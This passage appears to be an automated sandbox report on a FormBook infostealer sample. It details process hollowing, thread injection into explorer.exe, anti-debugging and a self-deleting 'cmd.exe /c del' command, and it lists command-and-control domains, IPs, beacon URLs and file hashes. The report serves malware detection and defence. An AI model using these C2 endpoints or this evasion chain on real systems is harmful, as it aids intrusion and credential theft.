          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_6F731000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Users\user\Desktop\Y4U48592345670954.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DD0000Jump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000002.914350326.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.668563200.0000000005E50000.00000004.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery141Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383918 Sample: Y4U48592345670954.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 Y4U48592345670954.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\...\yow0w7y8ovyw.dll, PE32 10->28 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Contains functionality to prevent local Windows debugging 10->60 14 Y4U48592345670954.exe 10->14         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.contecoliving.com 69.163.220.52, 49760, 80 DREAMHOST-ASUS United States 17->30 32 www.tententacleshydro.com 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Uses netstat to query active network connections and open ports 17->46 21 NETSTAT.EXE 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Y4U48592345670954.exe17%VirustotalBrowse
          Y4U48592345670954.exe17%ReversingLabsWin32.Trojan.Injexa

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll6%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.1.Y4U48592345670954.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.NETSTAT.EXE.32fe660.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.Y4U48592345670954.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.NETSTAT.EXE.3d6f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.Y4U48592345670954.exe.2850000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          tententacleshydro.com4%VirustotalBrowse
          www.contecoliving.com0%VirustotalBrowse
          constipationhub.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.middlehambooks.com/klf/0%Avira URL Cloudsafe
          http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tententacleshydro.com
          		34.102.136.180
          		truefalseunknown
          www.contecoliving.com
          		69.163.220.52
          		truetrueunknown
          constipationhub.com
          		34.102.136.180
          		truefalseunknown
          identityofplace.com
          		34.102.136.180
          		truefalse
            		unknown
            www.identityofplace.com
            		unknown
            		unknowntrue
              		unknown
              www.tententacleshydro.com
              		unknown
              		unknowntrue
                		unknown
                www.constipationhub.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.middlehambooks.com/klf/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85Dtrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Upfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Upfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2wNETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.tiro.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.%s.comPAexplorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		low
                                    http://www.fonts.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      34.102.136.180
                                      		tententacleshydro.comUnited States
                                      		15169GOOGLEUSfalse
                                      69.163.220.52
                                      		www.contecoliving.comUnited States
                                      		26347DREAMHOST-ASUStrue

                                      General Information

                                      Joe Sandbox Version:31.0.0 Emerald
                                      Analysis ID:383918
                                      Start date:08.04.2021
                                      Start time:12:25:53
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Y4U48592345670954.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/3@4/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 27.9% (good quality ratio 25.5%)
                                      • Quality average: 74.3%
                                      • Quality standard deviation: 30.9%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 88
                                      • Number of non-executed functions: 62
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.43.139.144, 13.88.21.125, 20.82.210.154, 104.42.151.234, 52.155.217.156, 20.54.26.129, 23.10.249.26, 23.10.249.43, 20.82.209.183
                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      DREAMHOST-ASUSinvoice.exeGet hashmaliciousBrowse
                                      • 69.163.228.164
                                      56_012021.docGet hashmaliciousBrowse
                                      • 208.97.151.226
                                      sample.exeGet hashmaliciousBrowse
                                      • 173.236.229.64
                                      ARBmDNJS7m.exeGet hashmaliciousBrowse
                                      • 208.113.205.238
                                      New _Items.Xlsx.Pdf.exeGet hashmaliciousBrowse
                                      • 66.33.222.0
                                      Payment TT Copy. PDF.exeGet hashmaliciousBrowse
                                      • 66.33.222.0
                                      4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                      • 69.163.228.230
                                      eogHAzg03I.exeGet hashmaliciousBrowse
                                      • 67.205.11.26
                                      purchase order#034.exeGet hashmaliciousBrowse
                                      • 69.163.228.230
                                      BSG_ptf.exeGet hashmaliciousBrowse
                                      • 69.163.167.164
                                      nxHN51lQwj.exeGet hashmaliciousBrowse
                                      • 69.163.225.40
                                      kw8VTJCVE6.exeGet hashmaliciousBrowse
                                      • 69.163.225.40
                                      9JZ1Nq9jXa.exeGet hashmaliciousBrowse
                                      • 69.163.225.40
                                      RFQ 204871 AGC_pdf.exeGet hashmaliciousBrowse
                                      • 69.163.167.164
                                      RAQ11986.exeGet hashmaliciousBrowse
                                      • 69.163.225.47
                                      ORDER LIST.xlsxGet hashmaliciousBrowse
                                      • 173.236.158.78
                                      swift copy pdf.exeGet hashmaliciousBrowse
                                      • 173.236.165.225
                                      Inquiry pdf.exeGet hashmaliciousBrowse
                                      • 173.236.165.225
                                      SHIPPING DOCS.xlsxGet hashmaliciousBrowse
                                      • 69.163.157.222
                                      RFQ SECO WARWICK Germany.docGet hashmaliciousBrowse
                                      • 173.236.190.98

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\3kusvrc50ywls0rc
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):185856
                                      Entropy (8bit):7.999086744314393
                                      Encrypted:true
                                      SSDEEP:3072:DJrpwn8nX8cVji9mN7vyqjC2Hw1cfy6VPbPixK3gf+HiL1mVURAZkylpmbkxQFGh:rDX8Ai9mv9eMy6VP+xNYkm0spiNGh
                                      MD5:04F2CCB649106E4B8403BA47BF0B161D
                                      SHA1:D686FB1081635869059CE0034FD1EDD0A01E35E7
                                      SHA-256:D60A87D9CE46455806CDE5F3A8515DF1A515C9062139C76D14BF75BEAECAD527
                                      SHA-512:12999CFF3B8442865DFC09508CF13F4829A279172EB8A85E5D92889C297894AEE0EAAB04149958D952C17CB9AD8F7816EE9DD6BCD758CD7D59D69441F4AC859F
                                      Malicious:false
                                      Reputation:low
